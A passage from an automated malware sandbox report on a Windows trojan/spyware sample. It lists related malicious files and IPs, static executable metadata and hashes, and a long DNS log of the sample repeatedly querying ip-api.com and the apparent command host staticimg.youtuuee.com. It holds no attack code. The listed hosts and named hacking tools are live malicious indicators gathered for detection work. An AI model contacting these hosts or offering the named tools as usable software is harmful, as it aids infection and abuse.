Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211

Number of analysed new started processes analysed:

23

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal64.troj.spyw.winEXE@1/0@146/3

EGA Information: Failed

HDC Information: Failed

HCA Information: Failed

Cookbook Comments: Adjust boot timeEnable AMSI

Warnings:

IP

192.168.2.1

Time Type Description

09:46:11 API Interceptor 403x Sleep call for process: 7PPXbfDkRN.exe modified

Match Associated Sample Name / URL SHA 256 Detection Link Context

208.95.112.1 13294_Video_Oynat#U0131c#U0131.apk Get hash malicious Browse ip-api.com/json

Comprobante de pago.xls Get hash malicious Browse ip-api.com/json/

Private

Show All

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Copyright Joe Security LLC 2021 Page 10 of 58

Page 11: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Comprobante de pago.doc Get hash malicious Browse ip-api.com/json/

Pv9HB349oG.exe Get hash malicious Browse ip-api.com/json

PozfYoUNtW.exe Get hash malicious Browse ip-api.com/json

DiscordSniper.exe Get hash malicious Browse ip-api.com//json/102.129.143.33

Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse ip-api.com//json/102.129.143.33

HazardNuker.exe Get hash malicious Browse ip-api.com/line/?fields=hosting

2wY8F2BCNp.exe Get hash malicious Browse ip-api.com/json

7WVpng6phO.exe Get hash malicious Browse ip-api.com/json/

Comprobante de pago (OCT).xls Get hash malicious Browse ip-api.com/json/

tywt33OZI0.exe Get hash malicious Browse ip-api.com/json

7mqSo6rtA0.exe Get hash malicious Browse ip-api.com/json

nIXnNtZvtI.exe Get hash malicious Browse ip-api.com/json/

nKnpb3gEQR.exe Get hash malicious Browse ip-api.com/json/

Xg4Pb7Cx99.exe Get hash malicious Browse ip-api.com/json

z7PRVhbVyw.exe Get hash malicious Browse ip-api.com/json

nZNwo47cxY.exe Get hash malicious Browse ip-api.com/json/

nZNwo47cxY.exe Get hash malicious Browse ip-api.com/json/

Pago_Monex_usd.xls Get hash malicious Browse ip-api.com/json/

Match Associated Sample Name / URL SHA 256 Detection Link Context

Match Associated Sample Name / URL SHA 256 Detection Link Context

ip-api.com Comprobante de pago.xls Get hash malicious Browse 208.95.112.1

Comprobante de pago.doc Get hash malicious Browse 208.95.112.1

Pv9HB349oG.exe Get hash malicious Browse 208.95.112.1

PozfYoUNtW.exe Get hash malicious Browse 208.95.112.1

DiscordSniper.exe Get hash malicious Browse 208.95.112.1

Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse 208.95.112.1

HazardNuker.exe Get hash malicious Browse 208.95.112.1

2wY8F2BCNp.exe Get hash malicious Browse 208.95.112.1

7WVpng6phO.exe Get hash malicious Browse 208.95.112.1

Comprobante de pago (OCT).xls Get hash malicious Browse 208.95.112.1

tywt33OZI0.exe Get hash malicious Browse 208.95.112.1

7mqSo6rtA0.exe Get hash malicious Browse 208.95.112.1

nIXnNtZvtI.exe Get hash malicious Browse 208.95.112.1

nKnpb3gEQR.exe Get hash malicious Browse 208.95.112.1

Xg4Pb7Cx99.exe Get hash malicious Browse 208.95.112.1

z7PRVhbVyw.exe Get hash malicious Browse 208.95.112.1

nZNwo47cxY.exe Get hash malicious Browse 208.95.112.1

nZNwo47cxY.exe Get hash malicious Browse 208.95.112.1

Pago_Monex_usd.xls Get hash malicious Browse 208.95.112.1

W82FHNSBQu.exe Get hash malicious Browse 208.95.112.1

staticimg.youtuuee.com nKnpb3gEQR.exe Get hash malicious Browse 45.136.151.102

nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102

nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102

NOEvrN6EpT.exe Get hash malicious Browse 45.136.151.102

4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exe

Get hash malicious Browse 45.136.151.102

tgmA1R5JHH.exe Get hash malicious Browse 45.136.151.102

Domains

Copyright Joe Security LLC 2021 Page 11 of 58

Page 12: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

g9d9sc3dDi.exe Get hash malicious Browse 45.136.151.102

g9d9sc3dDi.exe Get hash malicious Browse 45.136.151.102

92aAMtF9lF.exe Get hash malicious Browse 45.136.151.102

AeXXqhQNJKur7teIlOrvF329.exe Get hash malicious Browse 45.136.151.102

48fl6271oClv7lfnOsBHvbLy.exe Get hash malicious Browse 45.136.151.102

UZlg2Sq2pQ.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

TNIZtb3HS3.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

BC2CCE5055F9411C04EDEEE699D7161C257574B4C5540.exe

Get hash malicious Browse 45.136.151.102

F0627549D39AD1D85BCAAE5CF0B5A90B885658E348480.exe

Get hash malicious Browse 45.136.151.102

D44D77232A9E6E684F1ECE4C9C05B3DCB63D4296CFD29.exe

Get hash malicious Browse 45.136.151.102

2D100CC76F229AC10A7589E1AEA0BFB47B5692840D8F2.exe

Get hash malicious Browse 45.136.151.102

Match Associated Sample Name / URL SHA 256 Detection Link Context

Match Associated Sample Name / URL SHA 256 Detection Link Context

ENZUINC-US setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

Fri051e1e7444.exe Get hash malicious Browse 45.136.151.102

SEnSqwqeRl Get hash malicious Browse 23.88.113.7

Q2dNzrdHL5 Get hash malicious Browse 23.88.113.7

vCLbAS7aPb Get hash malicious Browse 23.88.113.7

cZw3sVi3XA Get hash malicious Browse 23.88.113.7

UP7YvQ7MD5 Get hash malicious Browse 23.88.113.7

TXdFsHmNmT Get hash malicious Browse 23.88.113.7

7xe3YujfLB Get hash malicious Browse 23.88.113.7

GzLV5uJyv0 Get hash malicious Browse 23.88.113.7

IVkF8LNn8r Get hash malicious Browse 23.88.113.7

M1UhoPMTwf Get hash malicious Browse 23.88.113.7

wA5D1yZuTf.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102

arm7 Get hash malicious Browse 23.245.1.206

nKnpb3gEQR.exe Get hash malicious Browse 45.136.151.102

nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102

nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102

NOEvrN6EpT.exe Get hash malicious Browse 45.136.151.102

TUT-ASUS C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe

Get hash malicious Browse 208.95.112.1

setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1

13294_Video_Oynat#U0131c#U0131.apk Get hash malicious Browse 208.95.112.1

Fri051e1e7444.exe Get hash malicious Browse 208.95.112.1

Comprobante de pago.xls Get hash malicious Browse 208.95.112.1

Comprobante de pago.doc Get hash malicious Browse 208.95.112.1

wA5D1yZuTf.exe Get hash malicious Browse 208.95.112.1

Pv9HB349oG.exe Get hash malicious Browse 208.95.112.1

setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1

PozfYoUNtW.exe Get hash malicious Browse 208.95.112.1

DiscordSniper.exe Get hash malicious Browse 208.95.112.1

Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse 208.95.112.1

HazardNuker.exe Get hash malicious Browse 208.95.112.1

2wY8F2BCNp.exe Get hash malicious Browse 208.95.112.1

7WVpng6phO.exe Get hash malicious Browse 208.95.112.1

Comprobante de pago (OCT).xls Get hash malicious Browse 208.95.112.1

tywt33OZI0.exe Get hash malicious Browse 208.95.112.1

setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1

7mqSo6rtA0.exe Get hash malicious Browse 208.95.112.1

nIXnNtZvtI.exe Get hash malicious Browse 208.95.112.1

ASN

JA3 Fingerprints

Copyright Joe Security LLC 2021 Page 12 of 58

Page 13: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Static File Info

GeneralFile type: PE32+ executable (GUI) x86-64, for MS Windows

Entropy (8bit): 6.464543276535742

TrID: Win64 Executable GUI (202006/5) 92.65%Win64 Executable (generic) (12005/4) 5.51%Generic Win/DOS Executable (2004/3) 0.92%DOS Executable Generic (2002/1) 0.92%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%

File name: 7PPXbfDkRN.exe

File size: 1413632

MD5: 1614d9adfb1903a189e6efd9b6dc4077

SHA1: cfa0028bb78e1b0f51d4d389947319dd7beb10d5

SHA256: 42de2be8dd54f0733138e13af44653c7acf129ab0acc376d89a18b2b8a69101e

SHA512: d3000fa418a539e5f67bed3cfe4b754796eb18ee71e3e11635f0f9dc23fe4a0d25c173524c4e820958c0f3c5103f1db242737a5a8543c247fc2fa1913b251a2b

SSDEEP: 24576:P/mj8gr6siw8y8KbE0N4TMAeulQI1N6y83bMJb2dtGulJe:POjH7iby84E0aTrlQcNkbYidv

File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....h...h...h...l...h...k...h...m...h...m.".h...k...h.W.l...h.W.k...h.W.m._.h...i...h...i...h...a...h.......h...j...h.Rich..h

File Icon

Icon Hash: 00828e8e8686b000

No context

No context

No created / dropped files found

GeneralEntrypoint: 0x1400b2e74

Entrypoint Section: .text

Digitally signed: false

Imagebase: 0x140000000

Subsystem: windows gui

Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, HIGH_ENTROPY_VA

Time Stamp: 0x616F6E55 [Wed Oct 20 01:18:13 2021 UTC]

TLS Callbacks:

CLR (.Net) Version:

OS Version Major: 6

OS Version Minor: 0

File Version Major: 6

File Version Minor: 0

Subsystem Version Major: 6

Subsystem Version Minor: 0

Dropped Files

Created / dropped Files

Static PE Info

Copyright Joe Security LLC 2021 Page 13 of 58

Page 14: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Network Port Distribution

Import Hash: a760781485268ad462242975d68411d5

General

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

.text 0x1000 0x104e40 0x105000 False 0.528789885656 data 6.4831074188 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.rdata 0x106000 0x39d10 0x39e00 False 0.387811318844 data 5.30917318484 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.data 0x140000 0xee44 0xba00 False 0.255565356183 DOS executable (block device driver)

4.63509517254 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

.pdata 0x14f000 0xbc10 0xbe00 False 0.473725328947 data 6.06247808176 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

_RDATA 0x15b000 0xf4 0x200 False 0.322265625 data 2.47542112189 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.rsrc 0x15c000 0x238 0x400 False 0.3310546875 data 4.8804957568 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.reloc 0x15d000 0x20ec 0x2200 False 0.291590073529 data 5.40005907283 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Language of compilation system Country where language is spoken Map

English United States

Network Behavior

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Oct 24, 2021 09:46:11.946676970 CEST 192.168.2.5 8.8.8.8 0x9eb8 Standard query (0)

ip-api.com A (IP address) IN (0x0001)

Oct 24, 2021 09:46:12.464066982 CEST 192.168.2.5 8.8.8.8 0x70c5 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:13.722318888 CEST 192.168.2.5 8.8.8.8 0xe681 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:14.897198915 CEST 192.168.2.5 8.8.8.8 0x31f3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

TCP Packets

UDP Packets

DNS Queries

Copyright Joe Security LLC 2021 Page 14 of 58

Page 15: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:15.928636074 CEST 192.168.2.5 8.8.8.8 0xe589 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:17.180746078 CEST 192.168.2.5 8.8.8.8 0x9dac Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:18.349411964 CEST 192.168.2.5 8.8.8.8 0x8498 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:19.844815969 CEST 192.168.2.5 8.8.8.8 0x84fe Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:21.277093887 CEST 192.168.2.5 8.8.8.8 0x8a28 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:22.573318958 CEST 192.168.2.5 8.8.8.8 0xe2c7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:23.903523922 CEST 192.168.2.5 8.8.8.8 0x64d7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:25.446630001 CEST 192.168.2.5 8.8.8.8 0xdace Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:26.965976954 CEST 192.168.2.5 8.8.8.8 0x6af1 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:28.604495049 CEST 192.168.2.5 8.8.8.8 0x5c0b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:30.065850973 CEST 192.168.2.5 8.8.8.8 0xed9f Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:31.754086971 CEST 192.168.2.5 8.8.8.8 0xa4a9 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:33.409524918 CEST 192.168.2.5 8.8.8.8 0xe6d1 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:34.893749952 CEST 192.168.2.5 8.8.8.8 0xccc3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:36.386101961 CEST 192.168.2.5 8.8.8.8 0xde90 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:37.836447954 CEST 192.168.2.5 8.8.8.8 0x3d9 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:39.118809938 CEST 192.168.2.5 8.8.8.8 0x2d99 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:40.715872049 CEST 192.168.2.5 8.8.8.8 0x4bb7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:41.984565020 CEST 192.168.2.5 8.8.8.8 0x1393 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:43.132354975 CEST 192.168.2.5 8.8.8.8 0x493e Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:43.751763105 CEST 192.168.2.5 8.8.8.8 0x37a8 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:44.392185926 CEST 192.168.2.5 8.8.8.8 0x449d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:45.017168045 CEST 192.168.2.5 8.8.8.8 0xc73e Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:45.657663107 CEST 192.168.2.5 8.8.8.8 0x9934 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:46.295425892 CEST 192.168.2.5 8.8.8.8 0xb8ed Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:46.924460888 CEST 192.168.2.5 8.8.8.8 0x34f7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:47.573483944 CEST 192.168.2.5 8.8.8.8 0x367c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:48.228705883 CEST 192.168.2.5 8.8.8.8 0x81a9 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:48.849603891 CEST 192.168.2.5 8.8.8.8 0xbe8f Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:49.485466957 CEST 192.168.2.5 8.8.8.8 0x8469 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:50.119240999 CEST 192.168.2.5 8.8.8.8 0x23af Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:50.750996113 CEST 192.168.2.5 8.8.8.8 0x35c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:51.378859997 CEST 192.168.2.5 8.8.8.8 0x82eb Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:51.999598980 CEST 192.168.2.5 8.8.8.8 0xabd4 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:52.629050016 CEST 192.168.2.5 8.8.8.8 0x7d96 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:53.256057024 CEST 192.168.2.5 8.8.8.8 0xa1d4 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:53.888422012 CEST 192.168.2.5 8.8.8.8 0x82e6 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Copyright Joe Security LLC 2021 Page 15 of 58

Page 16: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:54.512336016 CEST 192.168.2.5 8.8.8.8 0x4eba Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:55.152755022 CEST 192.168.2.5 8.8.8.8 0x29fb Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:55.778196096 CEST 192.168.2.5 8.8.8.8 0xb16d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:56.420088053 CEST 192.168.2.5 8.8.8.8 0x187d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:57.084909916 CEST 192.168.2.5 8.8.8.8 0x74ac Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:57.711780071 CEST 192.168.2.5 8.8.8.8 0xbf1d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:58.345809937 CEST 192.168.2.5 8.8.8.8 0x9bba Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:58.963766098 CEST 192.168.2.5 8.8.8.8 0x42ad Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:46:59.588766098 CEST 192.168.2.5 8.8.8.8 0x800d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:00.236520052 CEST 192.168.2.5 8.8.8.8 0x654a Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:00.854355097 CEST 192.168.2.5 8.8.8.8 0x1137 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:01.488159895 CEST 192.168.2.5 8.8.8.8 0x1ba Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:02.108387947 CEST 192.168.2.5 8.8.8.8 0x9dae Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:02.715982914 CEST 192.168.2.5 8.8.8.8 0xd880 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:03.357161045 CEST 192.168.2.5 8.8.8.8 0xc520 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:03.991808891 CEST 192.168.2.5 8.8.8.8 0x6619 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:04.612890959 CEST 192.168.2.5 8.8.8.8 0xa0c7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:05.234589100 CEST 192.168.2.5 8.8.8.8 0xded4 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:05.879797935 CEST 192.168.2.5 8.8.8.8 0xc7b8 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:06.523844004 CEST 192.168.2.5 8.8.8.8 0xe70a Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:07.132085085 CEST 192.168.2.5 8.8.8.8 0xa97e Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:07.765436888 CEST 192.168.2.5 8.8.8.8 0xe8de Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:08.387015104 CEST 192.168.2.5 8.8.8.8 0x8d83 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:09.002317905 CEST 192.168.2.5 8.8.8.8 0x30ae Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:09.626015902 CEST 192.168.2.5 8.8.8.8 0x4a01 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:10.249627113 CEST 192.168.2.5 8.8.8.8 0x6280 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:10.964214087 CEST 192.168.2.5 8.8.8.8 0xdb87 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:11.956691980 CEST 192.168.2.5 8.8.8.8 0x197e Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:13.232443094 CEST 192.168.2.5 8.8.8.8 0x31c7 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:13.898673058 CEST 192.168.2.5 8.8.8.8 0x22e5 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:14.507369995 CEST 192.168.2.5 8.8.8.8 0x9cba Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:15.110958099 CEST 192.168.2.5 8.8.8.8 0xac31 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:15.722754955 CEST 192.168.2.5 8.8.8.8 0xc91 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:16.362447023 CEST 192.168.2.5 8.8.8.8 0xbb6 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:16.981462002 CEST 192.168.2.5 8.8.8.8 0xd77c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:17.597531080 CEST 192.168.2.5 8.8.8.8 0x6291 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:18.550430059 CEST 192.168.2.5 8.8.8.8 0x852f Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Copyright Joe Security LLC 2021 Page 16 of 58

Page 17: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:47:19.168601036 CEST 192.168.2.5 8.8.8.8 0x57a2 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:19.781433105 CEST 192.168.2.5 8.8.8.8 0xc556 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:20.381217003 CEST 192.168.2.5 8.8.8.8 0x46f3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:20.995613098 CEST 192.168.2.5 8.8.8.8 0xf185 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:21.603290081 CEST 192.168.2.5 8.8.8.8 0x1604 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:22.232975960 CEST 192.168.2.5 8.8.8.8 0x94b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:22.881362915 CEST 192.168.2.5 8.8.8.8 0x47d3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:23.503819942 CEST 192.168.2.5 8.8.8.8 0xf03d Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:24.114782095 CEST 192.168.2.5 8.8.8.8 0xc178 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:24.762109041 CEST 192.168.2.5 8.8.8.8 0x3452 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:25.395534992 CEST 192.168.2.5 8.8.8.8 0xcb54 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:26.010318041 CEST 192.168.2.5 8.8.8.8 0xcbc1 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:26.613825083 CEST 192.168.2.5 8.8.8.8 0xcd1c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:27.235318899 CEST 192.168.2.5 8.8.8.8 0xbda2 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:27.846848011 CEST 192.168.2.5 8.8.8.8 0xc3e3 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:28.439615011 CEST 192.168.2.5 8.8.8.8 0xd6db Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:29.127942085 CEST 192.168.2.5 8.8.8.8 0x54b1 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:29.765466928 CEST 192.168.2.5 8.8.8.8 0x7045 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:30.813688040 CEST 192.168.2.5 8.8.8.8 0x38d8 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:32.156006098 CEST 192.168.2.5 8.8.8.8 0xc19c Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:32.789815903 CEST 192.168.2.5 8.8.8.8 0xa789 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:33.416050911 CEST 192.168.2.5 8.8.8.8 0xd6e6 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:34.055989027 CEST 192.168.2.5 8.8.8.8 0x829b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:34.681870937 CEST 192.168.2.5 8.8.8.8 0x7737 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:35.311105013 CEST 192.168.2.5 8.8.8.8 0xa830 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:35.910501957 CEST 192.168.2.5 8.8.8.8 0x9192 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:36.514367104 CEST 192.168.2.5 8.8.8.8 0x8a43 Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:37.144071102 CEST 192.168.2.5 8.8.8.8 0x9f3b Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:37.766935110 CEST 192.168.2.5 8.8.8.8 0xa3aa Standard query (0)

staticimg.youtuuee.com

A (IP address) IN (0x0001)

Oct 24, 2021 09:47:38.386548996 CEST 192.168.2.5 8.8.8.8 0x84a2 Standard query (0)

staticimg.youtuuee.com

